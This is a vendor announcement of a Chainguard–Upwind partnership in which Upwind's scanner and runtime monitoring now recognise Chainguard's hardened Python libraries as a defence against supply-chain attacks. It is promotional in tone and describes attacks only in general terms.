Chainguard and Upwind: Secure what you build. Verify what you run.

They called it the year of the software supply chain.

Today, we’re excited to announce that Upwind now scans Chainguard Libraries for Python.

Recent software supply chain attacks have made one thing clear. Attackers do not need CVEs to cause damage. Incidents involving popular packages like axios and security tooling like Trivy did not rely on known, patchable vulnerabilities. They exploited trust in public registries by distributing malicious packages that exfiltrate credentials and steal company data. 

At the same time, frontier models like GPT-5.5 and Mythos are discovering new vulnerabilities faster than the average team can remediate. It’s one of the reasons Chainguard is proud to be the first cybersecurity company to offer a one calendar day known exploited vulnerability SLA.

Security is now shifting further left. The focus for application security teams has shifted from reducing CVEs toward reducing the overall attack surface. To stay secure in 2026, teams need to start with open source artifacts that are malware-free and have zero CVEs.

Why current approaches fall short

Modern applications depend on large and changing sets of components. It is common for a single service to rely on hundreds or thousands of packages, many of which are updated frequently. Manual verification of these dependencies is not realistic at scale, and automated tools are designed primarily to detect known issues rather than establish trust.

Scanning continues to play an essential role, ensuring what is running in production is secure and expected. However, scanning can also produce lots of unprioritized noise. Security teams spend significant time triaging alerts that may not be relevant to their actual runtime environment. At the same time, periodic scanning cannot capture short-lived workloads or changes that occur between scan intervals. This creates blind spots that are difficult to close using traditional approaches alone.

Runtime visibility is a critical layer of defense, showing exactly what code is active, which components are exposed to real risk, and what's actually exploitable in your environment. But runtime insights deliver the most value when the baseline environment is already as clean as possible. Without that foundation, teams are still left sifting through noise and trying to determine which signals matter. 

Trusted artifacts with runtime verification

A stronger model starts before the first line of code is written. It means starting with a secure-by-default set of open source artifacts that span your development needs.

Teams need confidence that the artifacts they start with are malware-free and have near-zero CVEs. That confidence then needs to be verified via scanning. This combination allows organizations to reduce risk at the source while continuously validating that production systems are operating as intended. That is the foundation of the Chainguard and Upwind partnership.

Chainguard delivers a full suite of open source artifacts that are trusted, verified, and secure. This includes Chainguard Containers, Chainguard Libraries, Chainguard Actions, and Chainguard Agent Skills. These artifacts are built from source, and designed to ensure that the packaged artifact always matches the source code bit-for-bit. By starting with components that are minimal, hardened, and verifiable, teams reduce the likelihood of introducing vulnerable or malicious artifacts into their environments.

Upwind provides deep visibility into what is actually happening with those artifacts and the rest of your code in production. Its runtime sensors observe which components are loaded, how services communicate, and which code paths are executed. This allows customers to distinguish what's actively reachable and exploitable from theoretical vulnerabilities that never touch production.

Runtime intelligence enables security teams to shrink alert volumes and focus remediation efforts where they matter most. Because Upwind maps remediation paths where a handful of fixes can resolve thousands of findings, security and engineering teams spend less time triaging alerts and more time building. 

Upwind now validates Chainguard Libraries

Upwind extends this model by delivering both scanning and runtime visibility across the software lifecycle. This now includes support for Chainguard Libraries for Python, enabling dependency scanning across environments regardless of whether applications are built with pip, uv, or poetry. Upwind’s scanner now recognizes the critical and high-severity CVEs Chainguard is remediating across older, harder-to-upgrade versions of Flask, Django, aiohttp, setuptools, and more.

This integration allows joint customers to resolve the severe Python CVEs that have plagued their applications and have those resolutions quiet their Upwind scans. This gives your team more time to plan your next major version upgrade without worrying about the major known vulnerabilities in your software.

Beyond vulnerability reduction, Upwind provides an additional layer of protection against software supply chain threats that cannot be solved through package updates alone. Even trusted dependencies can become attack vectors through malicious package updates, compromised maintainers, poisoned transitive dependencies, or unexpected runtime behavior. Upwind’s deep runtime visibility has proven effective in detecting suspicious package execution, abnormal process behavior, unauthorized outbound communications, secret access, and other indicators of supply chain compromise in production. Together with Chainguard’s hardened libraries, customers benefit from both proactive risk reduction and runtime detection of threats that evade traditional dependency hygiene.

What this partnership means for you

Platform and DevOps teams see reduced operational overhead. Starting with trusted artifacts means fewer disruptions from security findings later in the process. Teams can maintain development velocity while adopting components that are designed to be secure by default.

For security leaders, this approach provides a more complete and measurable view of risk. It connects decisions made during development with outcomes observed in production, enabling teams to verify not just what was deployed but what is actively running and reachable. This makes it easier to demonstrate progress, justify investments, and align teams around a shared understanding of security priorities.

Looking ahead

Software supply chains are becoming more complex, all while the pace of development continues to accelerate and the level of sophistication of attacks continues to increase. As agent coding makes every system grow more dynamic, the gap between what is built and what actually runs in production grows wider. Organizations need security tools that account for both sides of that equation.

Combining trusted artifacts with runtime verification provides a path forward. It allows teams to reduce the likelihood of introducing risk while maintaining continuous awareness of how systems behave in real environments.

The most effective security strategies reduce risk before it enters the environment and continuously prove it with always-on runtime security. Chainguard and Upwind bring these capabilities together in a way that is built for the pace of modern development.

Secure what you build. Verify what you run.

Get in touch with our team to learn more.